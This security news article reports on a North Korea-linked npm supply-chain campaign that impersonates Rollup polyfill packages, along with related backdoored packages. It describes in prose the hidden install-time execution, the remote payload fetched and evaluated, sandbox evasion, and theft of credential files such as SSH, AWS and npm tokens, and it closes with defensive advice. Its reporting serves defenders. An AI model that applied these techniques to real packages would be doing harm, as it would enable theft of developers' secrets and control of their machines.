Skip to main content
Emerging ThreatsMalware & Ransomware

North Korea-Linked npm Packages Target Developers with Stealthy Data Theft

Developer workspace with laptop, monitor, and notes, overlooking cityscape through window.

"The lookalike packages place themselves in the same rollup, polyfill, core, and node naming space, which can look plausible during a quick dependency review," JFrog said. This tactic helped a cluster of malicious npm packages — linked by the reporter to threat actors with ties to North Korea — impersonate legitimate Rollup polyfill tooling to gain remote access and steal developer secrets.

JFrog analysis of rollup-packages-polyfill-core and rollup-runtime-polyfill-core

JFrog identified two primary packages, "rollup-packages-polyfill-core" and "rollup-runtime-polyfill-core," that mimic the legitimate "rollup-plugin-polyfill-node" project down to description, repository metadata, and package shape. Both packages were removed from the npm registry after discovery. Each lookalike hides a second-stage install: "rollup-packages-polyfill-core" installs and loads "swift-parse-stream," while "rollup-runtime-polyfill-core" installs "quirky-token." A number of other related packages were also removed: "quirky-token," "react-icon-svgs," "rollup-plugin-polyfill-connect," and "swift-parse-stream."

Second-stage packages, JSONKeeper, and concealed install-time execution

JFrog reported that the second-stage packages pose as SVG utilities and fetch a JSON object from JSONKeeper, then eval the model field. The campaign starts with a Base64-encoded npm install command for "swift-parse-stream" or "quirky-token" concealed within the top-level package. The layered structure — lookalike names, legitimate-looking metadata, hidden install-time execution, and environment checks — mirrors prior Lazarus-linked npm campaigns, JFrog said.

External fetch, sandbox evasion, and encrypted payload delivery

Once run past environment gates that avoid cloud development environments, sandboxes, serverless runtimes, and analysis infrastructure, the JavaScript reaches out to an external server at 216.126.236[.]244 to fetch an encrypted JavaScript payload. The decrypted payload acts as a loader for additional scripts that enable the attacker to interact with and control the compromised host.

Capabilities observed: remote control, credential theft, and developer-targeted collection

The later-stage payload provides both collection and control capabilities. JFrog described features that enable interactive terminal sessions, command execution, screenshot capture, process termination, and Windows-only mouse movement, clicks, scrolling, keyboard presses, and hotkeys using the "@nut-tree-fork/nut-js" package. The malware can steal data from web browsers and cryptocurrency wallets, collect files matching specific extensions, and periodically capture clipboard content. The file collector specifically searches for editor history associated with Microsoft Visual Studio Code, Windsurf, and Cursor, and for developer and AI tool configurations such as AWS, Microsoft Azure, Google Gemini, Anthropic Claude, Foundry, SSH, and Z shell (Zsh).

"Rollup plugins are commonly loaded from local configuration files, developer workstations, and CI jobs," JFrog noted, warning that these environments often have access to sensitive assets such as source code, npm tokens, Git credentials, cloud keys, SSH keys, browser data, and project secrets.

Concurrent supply chain discoveries by Checkmarx, SafeDep, and Chi Tran

  • Checkmarx found at least eight trojanized "pyrogram" forks published between November 2025 and June 2026, containing a hidden backdoor allowing arbitrary Python or shell commands and exfiltration of command results via Telegram; the activity was codenamed Operation Navy Ghost.
  • Investigators identified a cluster of 30 npm packages mimicking Polymarket tooling and general mathematics libraries that delivered a JavaScript infostealer reading crypto wallet vaults, browser credentials, SSH keys, AWS credentials, npm tokens, Docker configurations, shell history, and password manager databases.
  • A cluster of 25 npm packages under the @marketfront scope contained a postinstall credential harvester that reads 20 credential and secret files — including ~/.ssh, ~/.aws/credentials, ~/.kube/config, ~/.docker/config.json, ~/.npmrc, ~/.netrc, ~/.pgpass, ~/.git-credentials, and ~/.env — and exfiltrates the data.
  • A Python package named "security-alerts-sdk" harbored a backdoor that periodically polls 142.93.211[.]30:5000 for commands and exfiltrates SSH private keys, AWS credentials, Docker/npm/PyPI/git tokens, .env files, and browser credential databases to that server.
  • Researchers also reported clusters that download and execute Rust-compiled ELF binaries, a typosquat "events-runtime" that conditionally spawns a wallet stealer and exfiltrates reconnaissance data over Slack and Telegram, and an "o3forms" package that steals cloud credentials by splitting the attack between a benign registry package and a GitHub-pinned *-utils sub-dependency.

What this means for developer workstations, enterprises, and security teams

  • Developer workstations and CI/CD: Remove suspicious packages, assume compromise where they were installed, rotate credentials and keys, and block the malicious egress channels identified by investigators.
  • Enterprises and procurement leaders: Be wary of lookalike package names in rollup/polyfill/core/node naming spaces and enforce dependency scanning in CI/CD pipelines to flag newly published or suspicious packages.
  • Security teams and defenders: Monitor for hidden install-time execution, postinstall hooks, and second-stage fetches from JSONKeeper-like endpoints; prioritize detection of both collection and remote-control behaviors, given the overlap with known malware families like OtterCookie and BeaverTail.

JFrog stressed that the payload is broader than a simple downloader: once later stages run, attackers gain both collection and control capabilities targeted at developer environments where API keys, SSH keys, wallet material, cloud credentials, and project secrets are often present. The campaign's layered structure and lookalike naming echo previous Lazarus-linked npm activity, underscoring a sustained focus on poisoning open-source package repositories to steal valuable data.

https://thehackernews.com/2026/07/north-korea-linked-npm-packages-mimic.html